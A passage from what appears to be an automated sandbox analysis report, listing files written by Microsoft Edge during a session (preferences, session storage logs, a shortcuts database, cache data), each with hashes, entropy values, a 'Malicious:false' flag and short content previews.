                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):6144
                                                                                                                                                                                                                                                                  Entropy (8bit):0.8047826531474344
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:LBtiuWkKcwF11DM/FAf4AkZO7L0rqq9HzxP29:LLiuW9LFPY/Wf4AEo0rqqBzU
                                                                                                                                                                                                                                                                  MD5:0ACDF2D44AC5D01DD231BDD6BE2BFA7D
                                                                                                                                                                                                                                                                  SHA1:2DB610289619572AC1F0B2163249A04C3561FE38
                                                                                                                                                                                                                                                                  SHA-256:4E0B3E9F1A3CDF8B71BA16063B655C770321EF26C5C6750210133EF7899DDD31
                                                                                                                                                                                                                                                                  SHA-512:07573463F3FB57EBB20366F2503528C7944F7B83E27091BA3BADD07E70AE0997A70F27A0D72B2DC53F63FB9EC193211B4BC612F063AC07A9E415D9C528513B9E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9260
                                                                                                                                                                                                                                                                  Entropy (8bit):5.101493297958984
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stmrSNs9FsZihnkn3h88bV+FiA66WwaFIMY8P5YJ:stmrys9FfhqbGix6WwaTYb
                                                                                                                                                                                                                                                                  MD5:B418AC2E3C710B55088DAFD5BF820B37
                                                                                                                                                                                                                                                                  SHA1:987E0F35695B401F7B15F1E87F28184729435DF8
                                                                                                                                                                                                                                                                  SHA-256:7BCCFDD0A47B1DA09206123E2A8CBE61A749D591D4B066B31FFC016087C59C40
                                                                                                                                                                                                                                                                  SHA-512:9D06D2BB95020DA0AAF8F39AA08F356980D110978B7AA74D1F14F1CFF74640E91895593E8243C4E2C4318E6A91C404CEB492755785674176CD48C04A66F0039F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13379085859689246","domain_dive

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3c95c.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9260
                                                                                                                                                                                                                                                                  Entropy (8bit):5.101493297958984
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stmrSNs9FsZihnkn3h88bV+FiA66WwaFIMY8P5YJ:stmrys9FfhqbGix6WwaTYb
                                                                                                                                                                                                                                                                  MD5:B418AC2E3C710B55088DAFD5BF820B37
                                                                                                                                                                                                                                                                  SHA1:987E0F35695B401F7B15F1E87F28184729435DF8
                                                                                                                                                                                                                                                                  SHA-256:7BCCFDD0A47B1DA09206123E2A8CBE61A749D591D4B066B31FFC016087C59C40
                                                                                                                                                                                                                                                                  SHA-512:9D06D2BB95020DA0AAF8F39AA08F356980D110978B7AA74D1F14F1CFF74640E91895593E8243C4E2C4318E6A91C404CEB492755785674176CD48C04A66F0039F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13379085859689246","domain_dive

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF40d2b.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9260
                                                                                                                                                                                                                                                                  Entropy (8bit):5.101493297958984
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stmrSNs9FsZihnkn3h88bV+FiA66WwaFIMY8P5YJ:stmrys9FfhqbGix6WwaTYb
                                                                                                                                                                                                                                                                  MD5:B418AC2E3C710B55088DAFD5BF820B37
                                                                                                                                                                                                                                                                  SHA1:987E0F35695B401F7B15F1E87F28184729435DF8
                                                                                                                                                                                                                                                                  SHA-256:7BCCFDD0A47B1DA09206123E2A8CBE61A749D591D4B066B31FFC016087C59C40
                                                                                                                                                                                                                                                                  SHA-512:9D06D2BB95020DA0AAF8F39AA08F356980D110978B7AA74D1F14F1CFF74640E91895593E8243C4E2C4318E6A91C404CEB492755785674176CD48C04A66F0039F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13379085859689246","domain_dive

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF48420.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9260
                                                                                                                                                                                                                                                                  Entropy (8bit):5.101493297958984
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stmrSNs9FsZihnkn3h88bV+FiA66WwaFIMY8P5YJ:stmrys9FfhqbGix6WwaTYb
                                                                                                                                                                                                                                                                  MD5:B418AC2E3C710B55088DAFD5BF820B37
                                                                                                                                                                                                                                                                  SHA1:987E0F35695B401F7B15F1E87F28184729435DF8
                                                                                                                                                                                                                                                                  SHA-256:7BCCFDD0A47B1DA09206123E2A8CBE61A749D591D4B066B31FFC016087C59C40
                                                                                                                                                                                                                                                                  SHA-512:9D06D2BB95020DA0AAF8F39AA08F356980D110978B7AA74D1F14F1CFF74640E91895593E8243C4E2C4318E6A91C404CEB492755785674176CD48C04A66F0039F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13379085859689246","domain_dive

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28366
                                                                                                                                                                                                                                                                  Entropy (8bit):5.558198046809236
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:Zzcjww7pLGLhDaWPPzf3u8F1+UoAYDCx9Tuqh0VfUC9xbog/OVlM2l4rw5NpFtuL:Zzcjw8chDaWPPzf3uu1jaEBlp5ptI
                                                                                                                                                                                                                                                                  MD5:B1A3D3FCAA4B2295C253E0A940EAFEFB
                                                                                                                                                                                                                                                                  SHA1:7172C37921C563B04CED14C5404E56DE62082A30
                                                                                                                                                                                                                                                                  SHA-256:F0BF7D33E57CBD6B4A27A89E111E7571D028EC205D59C411F762F20D3D1B6B76
                                                                                                                                                                                                                                                                  SHA-512:3E18648B05551E5E07222440D8611805A740B0AE5D5A1A55CE6E1F527A20FD6162420693D4314C6FE715E2644EE154B1CCCC0E1ACE567BE11D1F62883E949A84
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085859262848","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085859262848","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3cb7f.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28366
                                                                                                                                                                                                                                                                  Entropy (8bit):5.558198046809236
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:Zzcjww7pLGLhDaWPPzf3u8F1+UoAYDCx9Tuqh0VfUC9xbog/OVlM2l4rw5NpFtuL:Zzcjw8chDaWPPzf3uu1jaEBlp5ptI
                                                                                                                                                                                                                                                                  MD5:B1A3D3FCAA4B2295C253E0A940EAFEFB
                                                                                                                                                                                                                                                                  SHA1:7172C37921C563B04CED14C5404E56DE62082A30
                                                                                                                                                                                                                                                                  SHA-256:F0BF7D33E57CBD6B4A27A89E111E7571D028EC205D59C411F762F20D3D1B6B76
                                                                                                                                                                                                                                                                  SHA-512:3E18648B05551E5E07222440D8611805A740B0AE5D5A1A55CE6E1F527A20FD6162420693D4314C6FE715E2644EE154B1CCCC0E1ACE567BE11D1F62883E949A84
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085859262848","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085859262848","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF40367.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28366
                                                                                                                                                                                                                                                                  Entropy (8bit):5.558198046809236
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:Zzcjww7pLGLhDaWPPzf3u8F1+UoAYDCx9Tuqh0VfUC9xbog/OVlM2l4rw5NpFtuL:Zzcjw8chDaWPPzf3uu1jaEBlp5ptI
                                                                                                                                                                                                                                                                  MD5:B1A3D3FCAA4B2295C253E0A940EAFEFB
                                                                                                                                                                                                                                                                  SHA1:7172C37921C563B04CED14C5404E56DE62082A30
                                                                                                                                                                                                                                                                  SHA-256:F0BF7D33E57CBD6B4A27A89E111E7571D028EC205D59C411F762F20D3D1B6B76
                                                                                                                                                                                                                                                                  SHA-512:3E18648B05551E5E07222440D8611805A740B0AE5D5A1A55CE6E1F527A20FD6162420693D4314C6FE715E2644EE154B1CCCC0E1ACE567BE11D1F62883E949A84
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085859262848","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085859262848","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):213
                                                                                                                                                                                                                                                                  Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                                                                  MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                                                                  SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                                                                                  SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                                                                  SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.087570799752106
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPWu5q2P923oH+TcwtrQMxIFUt8OoPcuYZZmw+OoPNkwO923oH+TcwtrQMFLJ:77mv4YebCFUt8OnZ/+OM5LYebtJ
                                                                                                                                                                                                                                                                  MD5:2306D5B45B7F023E8827AFA864B2594D
                                                                                                                                                                                                                                                                  SHA1:C1DC661B1313A1FBDDAA971F442FA6AAAEB2E832
                                                                                                                                                                                                                                                                  SHA-256:4C31AF69D6687DAC95452E1A53744C41E00D2EC495A40C75524CCA283C6BB6D8
                                                                                                                                                                                                                                                                  SHA-512:46F170EF82C0963436CE8962CA5CE0D859E95FCD9AD4E9496F0B0694E395B07F8471C908A64133C0ED05AC042D475CE7E1CA842D7DBCE505DF85C1D932AAD406
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.243 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/19-07:44:20.249 1e44 Recovering log #3.2024/12/19-07:44:20.255 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.087570799752106
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPWu5q2P923oH+TcwtrQMxIFUt8OoPcuYZZmw+OoPNkwO923oH+TcwtrQMFLJ:77mv4YebCFUt8OnZ/+OM5LYebtJ
                                                                                                                                                                                                                                                                  MD5:2306D5B45B7F023E8827AFA864B2594D
                                                                                                                                                                                                                                                                  SHA1:C1DC661B1313A1FBDDAA971F442FA6AAAEB2E832
                                                                                                                                                                                                                                                                  SHA-256:4C31AF69D6687DAC95452E1A53744C41E00D2EC495A40C75524CCA283C6BB6D8
                                                                                                                                                                                                                                                                  SHA-512:46F170EF82C0963436CE8962CA5CE0D859E95FCD9AD4E9496F0B0694E395B07F8471C908A64133C0ED05AC042D475CE7E1CA842D7DBCE505DF85C1D932AAD406
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.243 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/19-07:44:20.249 1e44 Recovering log #3.2024/12/19-07:44:20.255 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379085861771165

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2366
                                                                                                                                                                                                                                                                  Entropy (8bit):3.4906186485995487
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:3r3nhvkJCzx9/+Sh+TC/+Sh+TnP5IVdJCzyg:3rXhM8zxFdxd0IP8zyg
                                                                                                                                                                                                                                                                  MD5:9D8C18F097CF2B5D172A4A5606574555
                                                                                                                                                                                                                                                                  SHA1:2A59DC157D360BD9546BDFEBAB38F55E4C26A351
                                                                                                                                                                                                                                                                  SHA-256:4C38B03BF53EE27303A313E5AA72DE64448F430EE5F179BF7CC5AB6B8FC8D912
                                                                                                                                                                                                                                                                  SHA-512:B144802B18F39DEEC328233C8481B13E3CA0A86D0235F186F9228E4D47D5BD0A28C30588A3020D3BD35D24399EF262EAEDB8282A5E50E8CF4F30878E2DB06E19
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SNSS.........-W.............-W......"..-W.............-W.........-W.........-W.........-W....!....-W.................................-W..-W1..,.....-W$...d2d2b282_998c_45b5_99ec_a87e95115d09.....-W.........-W....=............-W.....-W....................5..0.....-W&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......-W............-W.........-W....!....-W.................................-W..-W1..,.....-W$...78cb4599_9e57_4f4c_981e_bb2cad0cbf87.....-W.........-W......W..........-W....Y..T.....-W....S...file:///C:/Users/user/AppData/Local/Temp/aff7310e-e430-4b16-86a8-ee19b2c5c7f2.pdf.....D...@...!...8...........................................................8...............@...............8.......8.g.)..9.g.)..x...............................H...................................................S...f.i.l.e.:./././.C.:./.U.s.e.r.s./.a.l.f.o.n.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.a.f.f.7.3.1.0.e.-.e.4.3.0.-.4.b.1.6.-.8.6.a.8.-.e.e.1.9.b.2.c.5.c.7.f.2...p.d.f.............................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1672645317383195
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oqVOq2P923oH+Tcwt7Uh2ghZIFUt8OoqYdhZmw+OoqYd7kwO923oH+Tcwt7Uh2w:7DVOv4YebIhHh2FUt8OKh/+OK75LYebs
                                                                                                                                                                                                                                                                  MD5:D73307CF403D171ED12B5F4D8A9B58F5
                                                                                                                                                                                                                                                                  SHA1:1AB050A34005A886712FAEBE5F1AC2C83157E9C4
                                                                                                                                                                                                                                                                  SHA-256:7B11D4E176CBB2C6B8C49DC77F3AAE2B525C8B07A136CAC28CC79C63C2F393F0
                                                                                                                                                                                                                                                                  SHA-512:8644C6937A42AD7D4625D2BC845939E8D9371CC6DCFAAF990887DEFDD2F9B8CA263AEAD2D002061A9B68B2C7F346A397A5E460327FD930912BDCB22989CFCA4D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.314 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/19-07:44:19.315 1d80 Recovering log #3.2024/12/19-07:44:19.315 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1672645317383195
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oqVOq2P923oH+Tcwt7Uh2ghZIFUt8OoqYdhZmw+OoqYd7kwO923oH+Tcwt7Uh2w:7DVOv4YebIhHh2FUt8OKh/+OK75LYebs
                                                                                                                                                                                                                                                                  MD5:D73307CF403D171ED12B5F4D8A9B58F5
                                                                                                                                                                                                                                                                  SHA1:1AB050A34005A886712FAEBE5F1AC2C83157E9C4
                                                                                                                                                                                                                                                                  SHA-256:7B11D4E176CBB2C6B8C49DC77F3AAE2B525C8B07A136CAC28CC79C63C2F393F0
                                                                                                                                                                                                                                                                  SHA-512:8644C6937A42AD7D4625D2BC845939E8D9371CC6DCFAAF990887DEFDD2F9B8CA263AEAD2D002061A9B68B2C7F346A397A5E460327FD930912BDCB22989CFCA4D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.314 1d80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/19-07:44:19.315 1d80 Recovering log #3.2024/12/19-07:44:19.315 1d80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                  Encrypted:false
